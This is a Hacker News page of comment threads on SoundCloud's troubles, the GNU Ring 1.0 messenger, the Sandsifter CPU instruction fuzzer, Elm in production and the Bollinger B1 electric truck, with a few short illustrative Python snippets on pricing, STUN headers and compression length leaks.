SoundCloud's problem was that it tried to chase and copy competitors instead of being unique, even though it has a truly unique user experience, which it completely ignores (I probably need to write a blog post about it). By following the competition you don't win. You don't get a leadership position. You just lose slower.

As a result, SoundCloud ran into the notorious problem of wholesale transfer pricing [1] power. And it didn't have enough money to win, or even participate in, that battle.

[1] Wholesale transfer pricing = the bargaining power of company A that supplies a unique product XYZ to Company B which may enable company A to take the profits of company B by increasing the wholesale price of XYZ.
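A back-of-the-envelope illustration of that squeeze, with all numbers invented for the sake of the example:

```python
# Hypothetical numbers: B (the streaming service) earns some revenue per
# user and pays A (the label) a per-user license fee that A controls.
revenue_per_user = 10.00
other_costs_per_user = 3.00

def b_profit(license_fee: float) -> float:
    # B's per-user profit after its own costs and A's license fee.
    return revenue_per_user - other_costs_per_user - license_fee

# A can raise the fee toward B's entire margin, capturing B's profit.
assert b_profit(2.00) == 5.00   # healthy margin for B
assert b_profit(7.00) == 0.00   # A has extracted all of B's profit
```

The point of the definition is visible in the last line: because A's product is unique, nothing stops A from pricing the fee right up to B's margin.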

StreamBright 2 days ago 0 replies      
Well, there were several attempts by different groups, companies, and people to build on their API that failed for no good reason. They simply declined API access requests without any reasoning. They could have made money from third parties, or even by selling music directly on their site. I usually go to SoundCloud to discover music and then to Bandcamp to buy it. I am not sure why this was never a focus for them.
loomer 2 days ago 0 replies      
It seems Discord is in the early stages of something like this. They have dozens of employees and a pre-money valuation of 725 million US dollars. However, very few users are buying their premium service, with most saying it isn't worth it; the paid version also only came out a year after Discord's release.
playing_colours 1 day ago 0 replies      
As one of the engineers in those 40% fired, I asked myself if I should try to start a startup: use this [0] money, plus try to raise more in the current situation. Say, to implement a good old vision of SoundCloud - a cozy creator-driven music catalog, with communities, and features like real time streaming. But I guess, even if we succeed initially, the company will be eventually killed by the major labels, copyright infringement cases, etc. It's a rough territory.

[0] http://www.thefader.com/2017/07/26/wetransfer-soundcloud-emp...

misingnoglic 2 days ago 0 replies      
SoundCloud used to be /the/ place for indie musicians to post their work - now I think websites like Bandcamp have more or less taken over. This article explains why - they basically stopped focusing on the artists - but I'm surprised they didn't mention competitors.
Myrmornis 2 days ago 1 reply      
This seemed to me a very sad story. The time during which SoundCloud as it was known and loved really existed was the era before they were really worrying about their "business model". As soon as they contemplated how they could exist long term, they started copying mainstream music services in a way that no-one loved. The real question is: given how much amazing free content there is, how are we going to nurture valuable cultural ecosystems like soundcloud, and create a meaningful and stable niche for them and their employees in our economies?
tovkal 2 days ago 0 replies      
It's always sad when a company has issues for months and nobody either sees them or acts during that time. Though 'Desde la barrera todo el mundo es torero' ('from behind the barrier, everyone is a bullfighter').
candiodari 1 day ago 0 replies      
> "Deals with the labels would have allowed us to have monetization," said one former executive, who explained that no ads could be run across label-owned content without a revenue-sharing agreement. "We needed to make sure that we could grow unencumbered without a lawsuit."

This sounds like a serious mistake. All the ones that succeeded asked for forgiveness afterwards rather than wait until they had permission.

arihant 1 day ago 0 replies      
I think the reason is that music subscription services took off massively, and globally, in the last 2-3 years. Apple Music expanded to a good number of nations, and so did Spotify and others. It has also become very easy for creators to put their music on those services. There are SaaS apps that put unlimited music on all platforms for artists for as little as $20 a year.

You don't need to partner with a record label any more to be on iTunes, Apple Music, Pandora, Google Play, Spotify, etc. You need $20 a year. The goliath that SoundCloud was fighting killed itself.

As a creator, I know there are 10x more people listening on Apple and Spotify. There is simply much less reason to upload to SoundCloud except for the community. And it is the community that they managed to piss off by partnering with the labels.

jackninja1 2 days ago 0 replies      
I think a few things are needed in order for SoundCloud to restore some of its value:

- They need to evaluate how their (IMHO) only competitor HypeMachine does things, and if possible consider an acquisition

- While probably very costly, they need to redesign their website (and app); their latest redesign was received very negatively

shp0ngle 2 days ago 0 replies      
I would be interested in how BandCamp is doing. They seem to have a product that both sides of the deal actually like - both buyers and sellers - and they have a business model from the start.

I have no idea how big BandCamp is, in terms of both users and developers.

pasta 2 days ago 1 reply      
Maybe I'm missing something but this article is telling me Soundcloud is dead. But is it?

Yes, they are having a hard time, but is there no way to continue with a small team?

As a Soundcloud user there is nothing telling me it is dead. Fresh music every day. So it's not like an exodus is happening.

philipps 2 days ago 0 replies      
I would hate to see SoundCloud disappear or get dismantled in an effort to migrate its user base into a different social network. The core idea, to provide a way for amateur creators to share their music, and connect with an audience, is sound. I also think there is/was a gap in the market for podcast creators that SoundCloud authoring tools could have filled. Can some combination of charging creators for advanced authoring or analytics, and placing ads in a free listening tier, not provide sufficient income to keep something like this going?
snakeanus 2 days ago 0 replies      
While I feel sorry for their employees I am quite happy that this happened. The censorship that they applied to the content that they hosted was quite disgusting.
demarq 2 days ago 0 replies      
Bringing up the bieber situation is entirely unfair. SoundCloud did the best any company could have done in that situation. His own label was also confused by the move.
blitzprog 2 days ago 2 replies      
From a consumer perspective, SoundCloud lost my interest when I heard it's 128 kbps transcoded mp3 you're getting when streaming songs.

No thanks.

bokglobule 2 days ago 0 replies      
The tech industry keeps repeating the same business mistakes. This period reminds me more and more of the 1998-99 era, when there was so much euphoria that there seemed to be no way but up. Then March 2000 came, the first Internet high flyers started to fail, and very quickly the whole thing unraveled. We're on the same road again...
drenvuk 1 day ago 0 replies      
Is it not possible to make a browser extension or app to "wrap" YouTube and turn it into a SoundCloud-like service? Seems to me they could transition a lot of their users over to it and possibly save money.
Rjevski 2 days ago 0 replies      
Personally I lost interest in late 2013 when they redesigned their UI (and made it crap) and started adding ads soon after. No thanks.
cubano 2 days ago 1 reply      
So what the hell is wrong with me?

I use SC everyday almost...I don't get this "collapse"?

Should I turn in my coolkid badge now?

rv77ax 1 day ago 0 replies      
Instead of pursuing major record labels, did they not even think about creating one?
shmerl 1 day ago 0 replies      
They could do what Bandcamp did instead. Bandcamp is growing.
BadassFractal 1 day ago 0 replies      
Should music creators who want a place to upload and get feedback on their work move to a different platform now or is SoundCloud going to be around for that for the foreseeable future?
briandear 1 day ago 0 replies      
Arial? There's the problem right there.
erikb 2 days ago 4 replies      
If anybody else is also put off by the writing style: there is some actual content there. One just needs to get through the first third, which basically just repeats the headline.

TL;DR (without my opinion added): Top management started too late to think about making actual money. They also hired an asshole for their US offices. When they got an opportunity to be bought by Twitter, they asked for way too much money. And the CEO has basically been on a constant holiday trip since 2014, while not failing to rub it in everybody's face via Instagram photos.

Personal opinion: I don't understand these CEOs who start cashing out before either selling their business or making it a viable paid service, while being so close to a lifetime solution to the problem of money. I mean he already went 80% of the way, much further than most.

Doctor_Fegg 2 days ago 3 replies      
Worth reading to the end for the deadpan Correction.
MIKarlsen 2 days ago 3 replies      
That's the second time this week I see Buzzfeed coming out with something that resembles decent journalism. Coincidence, or have they turned their ship around?
GNU Ring 1.0 released ring.cx
419 points by kilburn  4 days ago   184 comments top 27
kilburn 4 days ago 5 replies      
I've been testing it out, and it does not seem like a 1.0 release by any stretch of the imagination.

- On a mac, the client crashes regularly. I've been able to register an account and make a video call, but there are several GUI issues (cut labels, missing text fields, etc.) and the name registration didn't seem to work.

- On android, the client acted really weirdly in the beginning. After a while it seems to have stabilized a bit, and I've been able to make a video call (to a mac). The video quality was fine, but the client did not handle screen orientation changes well (my own video feed ended up distorted).

- On linux I haven't been able to make a call, even though text chat worked. It may have been because I don't have a webcam...

All in all, the experience was far from what you would expect from a 1.0 release nowadays. It had major warts on all the platforms I tested.

Also, if anyone is curious, you can log in with the same account from several devices at the same time. Calls ring on all devices, but text messages are less reliable (they don't always reach all devices). Also, offline devices do not get the messages they missed when you fire up the client later on.

I would love to push hard to replace Skype/XMPP with a solution of this kind, but I just cannot in the current state of affairs :(

Rjevski 4 days ago 4 replies      
Every time I see "GNU" I fear that it'll be more about "freedom" than actual functionality. Is the product actually any good (or at least on par with Skype, Hangouts, etc) or is this just something for free software fans to brag about with no productive use-case?
djezer 4 days ago 2 replies      
This is the brainchild of one of the founders of Savoir-Faire Linux. I was an employee of theirs and had to use this software for internal communications. It rarely works, crashes a lot, and employees would crack jokes every time we were told to use it. The idea is good. The current state of the app is barely usable. They just fired around a third of their employees (after promising to double in size).
Galanwe 4 days ago 9 replies      
Disclaimer: ex Skype employee.

Looks like a Skype clone from 10 years ago to me. I cannot see this working in the long run. Many people naively think that Skype switched from fully p2p, to partially p2p, to server-centric because of some evil plot designed by Microsoft. This is all wrong. Skype abandoned full peer-to-peer because it does not work if you want something fast, reliable, and feature-rich.

1. Asking users to enable UPnP is a joke. I would never do that, and anyone doing so should consider the security implications. Unfortunately, since they want to stay pure p2p, they have no other way to solve the "both clients behind a NAT router" problem. This is why Skype relies on STUN-like protocols => not possible in pure p2p.

2. Peer discovery in pure p2p is SLOW. Skype understood that and switched to hosted "supernodes" with their IPs hard-coded in the client. It's the only way to have reliable peers to introduce you to the network.

3. You WANT dedicated peers with good connection and 100% uptime.

4. You cannot efficiently have shared state in pure p2p without an identity server. It would require the clients to bring their keys with them on every device, which is not very practical.

5. In case the network collapses, there is no way for it to go up again without supernodes.
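For readers unfamiliar with the STUN-like protocols mentioned in point 1: a client behind NAT learns its public address by sending a small request to a well-known server outside the NAT. Below is a rough sketch of the fixed 20-byte STUN Binding Request header from RFC 5389 (construction only; a real client would send this over UDP to a STUN server and parse the XOR-MAPPED-ADDRESS attribute in the reply):

```python
import os
import struct

def stun_binding_request() -> bytes:
    # RFC 5389 header: 16-bit message type (0x0001 = Binding Request),
    # 16-bit body length (0 here: no attributes), the fixed magic cookie
    # 0x2112A442, and a random 96-bit transaction ID.
    msg_type = 0x0001
    length = 0
    magic_cookie = 0x2112A442
    transaction_id = os.urandom(12)
    return struct.pack("!HHI", msg_type, length, magic_cookie) + transaction_id

req = stun_binding_request()
assert len(req) == 20                   # STUN header is always 20 bytes
assert req[4:8] == b"\x21\x12\xa4\x42"  # magic cookie, network byte order
```

The catch the parent describes is that this is no longer "pure" p2p: someone has to run the well-known server.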

rvern 4 days ago 5 replies      
Unlike so many communication platforms created in this day and age, Ring provides something more than reinventing the wheel and following the latest trends. It is peer-to-peer, which XMPP and Matrix aren't. This is a step forward.

Edit: As some comments note, I previously wrote decentralized while meaning peer-to-peer.

chriswarbo 4 days ago 1 reply      
From https://tuleap.ring.cx/plugins/mediawiki/wiki/ring/index.php... I see the following under "Ring archive (export.gz)"

> Contains private account data.

> It's a JSON compressed and encrypted file.

> The JSON byte-stream is compressed using gzip algorithm.

> Then the gzip-stream is encrypted using AES-GCM-256 symmetric cipher with a 256-bits key.

Does this compress-then-encrypt combination introduce a security weakness? It's certainly a problem on the Web, since attackers can learn what's in an encrypted response by getting the server to insert their own strings; e.g. trying the same request many times with different query strings, and seeing which ones result in smaller responses, indicating that the given query string matches somewhere in the document.

It would require the attacker to be able to get their own strings in the payload, but since this JSON contains things like contact info that might be possible.
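The parent's worry is essentially the CRIME/BREACH class of attacks: compressing before encrypting makes ciphertext length depend on content. A minimal sketch of the length side channel using Python's zlib (the secret and the guesses are invented for illustration; real attacks also contend with padding and block granularity):

```python
import zlib

def compressed_len(payload: bytes) -> int:
    # Length of the DEFLATE-compressed payload. In the attack scenario this
    # is all an eavesdropper observes: encryption hides content, not length.
    return len(zlib.compress(payload))

secret = b'{"contact": "alice@example.com"}'

# The attacker injects equal-length guesses alongside the secret and watches
# the size: a guess that repeats bytes already present compresses better.
matching = compressed_len(secret + b'"contact": "alice@ex')
wrong = compressed_len(secret + b'"contact": "mallory@')

assert matching < wrong  # the correct guess yields a shorter output
```

Observing which guess produces the shorter ciphertext leaks whether it matches the secret, one confirmation at a time.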

onli 4 days ago 2 replies      
Does someone have that running and would share its current state? I tested ring at the beginning of this year and it was a disaster. Does it work now?
nannal 4 days ago 0 replies      
Is there somewhere we can dump bug reports, this feels so unready for 1.0.
kk_cz 4 days ago 2 replies      
from the tutorial:

> Please note that you shouldn't forget your password as long as you are using the current account. If you forget it, you won't be able to change it or get another one.

I can already see it being mass-adopted by non-tech users. /s

whoami_nr 3 days ago 0 replies      
This seems ideal in a scenario where everyone has switched to IPv6 and punching through NATs is no longer a problem.
kwhitefoot 3 days ago 0 replies      
Does anyone know how to install this on Linux Mint 18.2? It seems to depend on packages that are not available. As there were no instructions for Mint I tried the instructions for Ubuntu 17.10 but it fails:

Reading state information... Done

Some packages could not be installed. This may mean that you have requested an impossible situation or, if you are using the unstable distribution, that some required packages have not yet been created or been moved out of Incoming.

The following information may help to resolve the situation:

The following packages have unmet dependencies:

ring : Depends: libebook-1.2-19 (>= 3.17) but it is not installable

       Depends: libedataserver-1.2-22 (>= 3.17) but it is not installable
       Depends: libqt5core5a (>= 5.7.0) but 5.5.1+dfsg-16ubuntu7.2 is to be installed
       Depends: ring-daemon (= 20170724.1.2088f8e~dfsg1-1) but it is not going to be installed
E: Unable to correct problems, you have held broken packages.

amingilani 4 days ago 1 reply      
If you're trying to check this out and don't have anyone to talk to, like me, here's my contact info:

Contact me using 'gilani' on the Ring distributed communication platform: https://ring.cx

BTW, on Android, I had to set up my username after creating my account.

fulldecent 3 days ago 1 reply      
Is it just me, or does anyone else think this will be a lame project just because of GNU stewardship?
gboudrias 3 days ago 0 replies      
> Savoir-faire Linux

Love these guys! They're based in Montreal, definitely the biggest Linux-only player I know around here.

> Liberté, Égalité, Fraternité

That's a really bad name for a release. I speak French natively but... Nah.

The criticisms about missing features seem pretty reasonable as well, BUT I'm not afraid of this project being more ideological than practical. For one thing, SFL is in the money business, they are not a charity. For another, sometimes it takes someone to take the extreme "free" approach for someone else to approach the middle ground of "maybe not that free but still distributed".

anw 3 days ago 0 replies      
I am unable to create a public account. I get a spinning wheel when I input a public name, and it doesn't do anything else. The create button is disabled until (seemingly) I get a response back telling me my chosen name is okay or not.

Unfortunately, their Web site didn't seem to have any clear way to register an account.

Another point is that searching for contacts only works if you type in their last name. If you try searching for a contact by first name, then they won't show up.

scrumper 4 days ago 1 reply      
For those in the dark who don't want to do the digging I just did, Ring is "some sort of Skype or Hangout," to quote one of the project leaders.
kodfodrasz 3 days ago 0 replies      
It's not there yet, but seeing that Skype is repositioning itself as a shitty wannabe Snapchat/Instagram instead of a conferencing and telephony app, I hope it will mature and become a thing. (Hey Microsoft, what will Office 365 customers do with their Skype minutes when you finish the repositioning?)

They could sell SIP minutes and make them simple to set up, and that could provide revenue for them.

out_of_protocol 4 days ago 3 replies      
Could anybody point me to the docs? I can't find any explanation of how exactly it works; the only explanation I can find is <list of buzzwords>.
random3 3 days ago 0 replies      
It's a bit unexpected not to post the binaries' signatures along with the downloads, given the motivation of the project.
mempko 3 days ago 0 replies      
Seeing this makes me really want to add video support to my Firestr (http://firestr.com) project. Also a DHT, so I can store public keys and have shorter payloads to share. Alas, I am only one man.
coo1k 3 days ago 0 replies      
Is this similar to Bitmessage? https://www.bitmessage.org/wiki/Main_Page
cyborgx7 3 days ago 0 replies      
I've been reading the site and can't figure out what differentiates it from tox.
dna_polymerase 4 days ago 0 replies      
Apparently there is no release for Debian 8 Jessie. Is everyone on 9 already?
rufugee 3 days ago 2 replies      
For something that's free and not foisted upon anyone, there seems to be a lot of negativity here. Okay, so it's not as good as you want it to be. Roll up your sleeves and make it happen.
jonstokes 3 days ago 0 replies      
A friend told me that if you use the Ring then 7 days later all your files will be deleted.
yebyen 4 days ago 2 replies      
The Mac version warns me that I won't be able to run Ring because of my security settings and directs me to the Mac App Store to look for a newer version. Quite literally rolling on the floor laughing! (No, not literally)

"In the Finder, locate the app you want to open. Press the Control key and click the app icon, then choose Open from the shortcut menu. Click Open." I have never seen any Mac app for which I have ever needed to do this. Apple thinks it should warn me that I might have downloaded malware.

Does this mean that GNU did not pay the Apple tax?

fiatjaf 4 days ago 3 replies      
There is a GNU cryptocurrency project that aims to give the State the power to tax the users of the currency. How can you trust anything with the GNU label after that?
Sandsifter: find undocumented instructions and bugs on x86 CPU github.com
444 points by argorain  4 days ago   91 comments top 20
mcculley 4 days ago 3 replies      
This is great. That a program can learn about and exploit the CPU on which it is running from unprivileged userspace reminds me of the notion in Charlie Stross' Accelerando of running a timing attack against the universe to learn about the virtual machine in which we are being simulated.
_wmd 4 days ago 3 replies      
tl;dr of the slides:

  Found on one processor... instruction
  Single malformed instruction in ring 3 locks
  Tested on 2 Windows kernels, 3 Linux kernels
  Kernel debugging, serial I/O, interrupt analysis seem to confirm
  Unfortunately, not finished with responsible disclosure
  No details available [yet] on chip, vendor, or instructions
He's found a new f00f bug, winter 2017 is going to be interesting :)

hellbanner 4 days ago 2 replies      
Related: https://www.theregister.co.uk/2013/05/20/intel_chip_customiz...

"Everybody hates the golden screwdriver upgrade approach, where a feature is either hidden or activated through software, but the truth of the matter is that chip makers have been doing this sort of thing for decades and charging extra for it."

""We are moving rapidly in the direction of realizing that people want unique things and they are going to want them in silicon. In some cases, it will be done in software," said Waxman."

Also, GitHub says "several million" undocumented instructions... is that right? I don't know much about assembly but that number sounds absurdly high.

dtx1 4 days ago 2 replies      
This is highly interesting. I assume a lot of those are going to be debug instructions and instructions to help the binning process. Some of these might even unlock access to parts of the CPUs we aren't supposed to have access to, opening the door to custom microcode (though it's unlikely that anyone outside the CPU OEM can do that) and possibly allowing us to disable "security features" such as the Management Engine. This is a really interesting approach and I would love to see the results ported to other hardware/vendors. The same could potentially be done with GPUs, ARM CPUs, etc.
fovc 4 days ago 0 replies      
partycoder 4 days ago 1 reply      
SAI_Peregrinus 4 days ago 1 reply      
Christopher Domas does some very cool work. His System Management Mode exploit a few years back was quite nice. It will be interesting to see which processor it is that he found the ring 3 hard lockup instruction in...
d33 4 days ago 2 replies      
...isn't the usability of the tool limited because it's running in userspace, which has fewer privileges in terms of what instructions can be run?
tonyg 23 hours ago 0 replies      
I wonder what dbe0, dbe1, and df{c0-c7} do? They are present and undocumented in all of Intel, AMD and VIA's variations (see p4-p5 of the paper).
partycoder 4 days ago 0 replies      
Lots of weird stuff happening in CPUs nowadays.

There's a lot of mystery in microcode (equivalent to the CPU firmware), the "system management mode" aka protection ring -2, and the infamous management engine.

brawny 2 days ago 0 replies      
Out of curiosity, are there any toy compiler projects out there that try to make use of the incidental instructions? Could you possibly expect to see a worthwhile performance boost? (I'm thinking it would be unlikely...)
pbsd 3 days ago 0 replies      
For what it's worth, the size-prefixed jcc/call binutils bug had already been fixed a couple of years ago: https://sourceware.org/bugzilla/show_bug.cgi?id=18386
rurban 3 days ago 0 replies      
Regarding the ring 3 hard lockup he didn't disclose yet: isn't that the recent Kaby Lake/Skylake bug, disclosed about a month ago?
pwdisswordfish 3 days ago 1 reply      
The slides mention an 'apicall' opcode 0ffff0; searching the web turns up nothing but these same slides. Does anyone know anything about it?
ngneer 3 days ago 0 replies      
Chip vendors do the same in the course of validation, and technically even before any silicon has been fabricated, using simulators.
egberts1 3 days ago 1 reply      
Found another that is QEMU-specific.


purpleidea 4 days ago 0 replies      
wow... anyone have a link to the video of his talk?
shdon 4 days ago 2 replies      
No instructions there to disable the IME?
pmarreck 4 days ago 1 reply      
Is this basically a CPU fuzzer?
m00dy 4 days ago 0 replies      
Someone built a fuzzer for CPUs.
Elm in Production: 25K Lines Later charukiewi.cz
436 points by Albert_Camus  1 day ago   254 comments top 17
ToJans 1 day ago 7 replies      

> Elm has an incredibly powerful type system

Near the end of the article:

>Want to decode some JSON? Hard, especially if the JSON is heavily nested and it must be decoded to custom types defined in your application.

IMHO the lack of typeclasses/traits is really hurting Elm. Take Haskell, for example:

  {-# LANGUAGE DeriveGeneric #-}

  import Data.Aeson (FromJSON, ToJSON)
  import Data.Text (Text)
  import GHC.Generics (Generic)

  data Person = Person
    { name :: Text
    , age  :: Int
    } deriving (Generic, Show)

  instance ToJSON Person
  instance FromJSON Person
While I understand Evan's aversion to complexity, it makes me a bit wary about using Elm in production. I am currently using TypeScript, but if I needed a more powerful type system, I would probably switch to Haskell/PureScript or OCaml/BuckleScript instead.

antouank 1 day ago 2 replies      
After doing a couple of contracts on Elm projects for several months, and now returning to a React-Redux stack project, I cannot emphasize enough how much better working with Elm is.

In every single aspect. I just wish it goes mainstream as soon as possible.

His article is spot on, and it agrees with what I've seen and with what most others who have used Elm report. Just look it up.

dmjio 1 day ago 9 replies      
If decoding json in Elm is considered hard, I'd recommend checking out miso (https://github.com/dmjio/miso), a Haskell re-implementation of the Elm arch. It has access to mature json libraries like aeson for that sort of thing, along with mature lens libraries for updating your model. Here's an example of decoding json with GHC.Generics using typeclasses. https://github.com/dmjio/miso/blob/master/examples/xhr/Main....
endgame 1 day ago 5 replies      
I'm really looking forward to the day when all these new-to-Elm people start hitting the complexity ceiling of their language and convince the maintainers to add just a little more power. Example: Haskell's typeclasses have a high power-to-weight ratio, and Elm has to work around their absence (e.g., writing a fresh map function for each data type). Once there's a critical mass of frontend types who understand the power of FP, convincing people to try FP won't be the difficult step any more, and Elm won't need to try so hard to be un-intimidating.
advanderveer 1 day ago 1 reply      
What an excellent article: from tech to business, from the human aspect to practical code examples. Worth a read, even if you're not considering Elm.
dmitriid 1 day ago 3 replies      
> making very heavy use of Ajax calls to a JSON-based RESTful API

and then

> Want to decode some JSON? Hard, especially if the JSON is heavily nested and it must be decoded to custom types defined in your application. Doing this will require an understanding of how JSON decoding works in Elm and will usually result in quite a bit of code (our application contains over 900 lines of JSON decoders alone).

What a great pragmatic language

iamwil 1 day ago 1 reply      
Having started using Elm for side projects over 3 years ago, the article is pretty much spot on.

Programming in Elm had been a delight, especially when you let go of OOP and embrace functional concepts and practices. On one hand, you lose mental tools that you've relied on, but you gain the other tools you didn't even know existed before.

Where I really disliked Elm was when I had to encode or decode JSON. It's a giant royal pain in the ass. Also, when you find you have to break out to JS often for libraries you don't want to write yourself, it's not a good fit--as I found out when writing a toy interactive notebook to render markdown in Elm.

But for most SPAs that just manipulate form data and communicate with the server, it's a pretty great fit.

noshbrinken 16 hours ago 1 reply      
Something I find incredibly off-putting about Elm is the evangelical and generally unbalanced tone taken by many prominent members of the Elm community. I almost never come across Elm advocates accepting a valid criticism of the language. The response almost always amounts to "you don't understand" or "yes, but". They spend a lot of time celebrating the compiler's humanistic virtues but seem less clearly humanist in their relation to original thinking or diversity of thought. So much of Elm community dialogue (in talks, in articles, in the Elm slack which I follow daily) is simply those with more experience initiating those with less experience into the "Elm way" of doing things. For this reason, Elm feels more like a framework with a domain-specific language than a fully fledged programming language. And while it might seem like a gentle introduction to functional programming techniques, I'm not confident that it really teaches people the concepts themselves or gives them enough room to think critically about how to apply them. Instead, the task is to internalize and apply the "Elm way". The inability to even acknowledge the unprecedented labor required simply to parse a JSON response is a perfect example of the cultish mentality emerging in this community.
steinuil 1 day ago 0 replies      
I've used Elm for a while and I don't really see what the problem is with JSON decoders/encoders. Sure, they're verbose and annoying to write if you have a particularly intricate JSON structure, but I don't really see a better alternative for decoding and encoding JSON in a type-safe way, and within Elm's constraints on ease of learning.

More freedom on type-level programming would help, but that would certainly complicate the type system, and the only language I know that lets you fold over arbitrary record types is Ur/Web, which has a richer type system than even Haskell, and I don't see Elm adding things to its type system (other than type classes, hopefully), given that other interesting features were already removed because very few people used them.
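For readers who haven't written an Elm decoder: there is no direct Python equivalent, but the shape of the work is similar to hand-validating JSON into a typed record. A rough sketch (field names invented, loosely mirroring the Haskell example upthread):

```python
import json
from dataclasses import dataclass

@dataclass
class Person:
    name: str
    age: int

def decode_person(raw: str) -> Person:
    # The moral equivalent of an Elm decoder: check every field's presence
    # and type explicitly, and fail loudly otherwise.
    obj = json.loads(raw)
    if not isinstance(obj.get("name"), str):
        raise ValueError("person.name must be a string")
    if not isinstance(obj.get("age"), int):
        raise ValueError("person.age must be an int")
    return Person(name=obj["name"], age=obj["age"])

p = decode_person('{"name": "Ada", "age": 36}')
assert p == Person(name="Ada", age=36)
```

Multiply this by every record and every level of nesting and the "900 lines of decoders" figure quoted elsewhere in the thread becomes plausible; the payoff is that malformed payloads fail at the boundary instead of deep inside the app.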

delegate 1 day ago 2 replies      
Anyone familiar with both Elm and Clojurescript ?

Clojurescript's 're-frame' lib implements something similar to the Elm architecture and is quite pleasant to work with.

How does the Elm experience compare to the Clojurescript experience ?

unabst 23 hours ago 0 replies      
Quick question.

> Want to measure the height of an element on the page at the moment a user clicks on it? Hard, in order to do this we had to make heavy use of event bubbling and writing JSON decoders for the native event.target object that is produced by an onclick event.

What would be considered best practice?

Is it best practice to re-implement this sort of thing? Seems one could easily find vanilla JS code and encapsulate it, or add a helper lib?
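For what it's worth, the decoding the quoted article describes amounts to walking a path into the native event object. A plain-JS sketch of that idea — the event below is a hypothetical mock; in the browser the real object arrives in the onclick handler:

```javascript
// Safely pull a nested property (e.g. event.target.offsetHeight) out of an
// untyped native object, failing with a descriptive error instead of
// returning undefined. This is what an Elm-style decoder for event.target
// boils down to.
function decodeAt(path, value) {
  let cur = value;
  for (const key of path) {
    if (cur === null || typeof cur !== "object" || !(key in cur)) {
      throw new Error(`missing field "${key}" in path ${path.join(".")}`);
    }
    cur = cur[key];
  }
  return cur;
}

// Mock stand-in for the browser's event object.
const mockEvent = { target: { offsetHeight: 120, offsetWidth: 80 } };
const height = decodeAt(["target", "offsetHeight"], mockEvent); // 120
```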

fiatjaf 1 day ago 0 replies      
I think JSON decoding is great in Elm. Actually, that may be the best part of that language.
therealmarv 1 day ago 2 replies      
When JSON decoding is hard this is not a minor thing when looking at my RESTful APIs. This is a major trade off. How to deal with it ideally?
acobster 1 day ago 1 reply      
Great article! I have no experience with Elm but I'm much more likely to try it out now. I'm curious to hear your thoughts on this though:


niels 1 day ago 2 replies      
When I last tried Elm, I didn't find any really good UI libraries. Also there weren't any good solutions for i18n. Has the situation changed?
anon335dtzbvc 1 day ago 1 reply      
"JSON-based RESTful API as its back end" what language do you use for the backend, Haskell?
bandrami 1 day ago 1 reply      
I wonder if its successor framework will be called pine.
Bollinger B1: An electric truck with 360HP and up to 200 mile range theverge.com
314 points by smacktoward  4 days ago   272 comments top 43
masklinn 4 days ago 3 replies      
Looks interesting, the front trunk and cut-down "UI" look especially great. This looks like an EV you could actually work on in your garage.

Vaporware until they get a production line though, and the absence of airbags is somewhat worrying when it advertises a top speed of 127mph and 0-60 in 4.5s. At a GVWR of 10klbs it's outside the light-truck regs (8.5klbs GVWR) and thus isn't required to have them, but still...

Of note, the Verge article is light on useful pictures, there are other sites with interesting pics especially of the interior: http://www.motorauthority.com/news/1111790_bollinger-b1-the-...

And while it has the same dimensions as a Wrangler, it advertises 2~3 times the curb weight and towing capacity and almost twice the cargo volume (rear seats stowed). And the maximum ground clearance is pretty ridiculous as well (advertised as adjustable from 10 to 20 inches; most trucks seem to be between 8 and 12).

tyingq 4 days ago 9 replies      
I know it's a prototype, but I wonder how much thought was put into safety. The simplistic look makes you think there's probably no crumple zones. And there's clearly no driver's airbag, dashboard padding, etc.

Edit: The style seems heavily inspired by the original Ford Bronco. They even support the removable rear top. http://classicfordbroncos.com/builds/

kylehotchkiss 3 days ago 2 replies      
Wonder if they need a torque converter still to give it a little more oomph off road.

Also: "It also bucks the high-tech trend of new cars in general. There will be a radio with an AM/FM receiver, Bluetooth connectivity, and an AUX input, but there's no touchscreen." I hope this becomes a trend. Touchscreens in cars are horrible UX.

burger_moon 4 days ago 3 replies      
Can you recharge these on a normal gas generator? Something like a Miller engine driven generator[1] could probably do it but those are $$$ for the average joe. I only ask because a lot of people trailer their rock crawlers/mudders to more remote areas to go play and have fun, but when the electricity runs dry you'll need a way to power it back up. This thing looks like it'd be a lot of fun not only for daily use but also for backwoods offroading.

[1] https://www.millerwelds.com/equipment/welders/engine-driven/...

jay-anderson 3 days ago 0 replies      
> there's no touchscreen

I like this. Feels like many new cars are adding in a screen (touch or otherwise) while I prefer cars without it.

Animats 3 days ago 3 replies      
It's encouraging to see this. It's about time for electric pickup trucks. The price point ($60K) is going to be a problem for work trucks.

They talk about high speed, not low-speed high-torque. They don't say much about how the drivetrain behaves at low speed. Do they have locking differentials, or something that prevents wheel spin? It's a two-motor system. Does the motor control system know how to keep the front and back wheels in sync when traction is bad? You don't have a front-to-back differential; that's a software operation here. How good is very low speed, high-torque operation? There's no shifting, so you have to do low-speed control in software. With good software and differentials, this could be a good rock-crawler. Can you pull a stump with this thing? They should be able to do this, assuming they're using 3-phase motors like everybody else today.

Providing 120VAC power out is a nice feature. They don't say much about charging. It should carry a charger that can charge from 120/240VAC, so you could charge slowly from any power outlet if you have to. Or another Bollinger. You'd have a big charger at home base, but opportunistic charging is a necessity when you're far from charging stations.

Really needs air bags, and fewer sharp edges in the passenger compartment. Off-road that thing and you'll cut yourself on the door handles. Once they find a real manufacturer, they can clean up the interior.

Does it have a heater? That's a big problem with electrics, especially ones like this with no insulation.

[1] http://bollingermotors.com

aliston 3 days ago 1 reply      
I've been looking at buying an electric car recently and was surprised that the list of electric SUVs is really small. There's basically the Model X and not all that much more. The RAV4 EV got discontinued.

It seems to me that this is a huge market opportunity. The technology is right on the cusp of being very practical in terms of range. Soccer moms who commute to the grocery store and occasionally go on a trip to the mountains want a car with room and 4WD. If such a car existed, they would be shouting "take my money!" Not quite sure why the car manufacturers aren't building these things.

criddell 4 days ago 1 reply      
I wonder if the rise of electric vehicles is re-igniting the kit-car industry.

I still think about some of the kits from the 1970's.

For example:https://en.wikipedia.org/wiki/Kit_car#/media/File:3-4Nose.jp...

JohnJamesRambo 4 days ago 1 reply      
That looks amazing. I'd buy that in a heartbeat if I ever allowed myself to buy new cars.
macintux 3 days ago 0 replies      
Jalopnik just posted a good analysis of the design: http://jalopnik.com/the-bollinger-electric-truck-uses-an-ide...
jschwartzi 4 days ago 2 replies      
I've been wanting something like this for years. It doesn't seem like any car company is building an all-electric truck.
donavanm 3 days ago 0 replies      
I really want one. There's no reasonable modern adventure/utility truck on the market. Icons are nice but $$$. Same for all the other modern aftermarket conversions. Like many others I've settled on a 30-year-old truck (4Runner/Hilux Surf) for this niche.

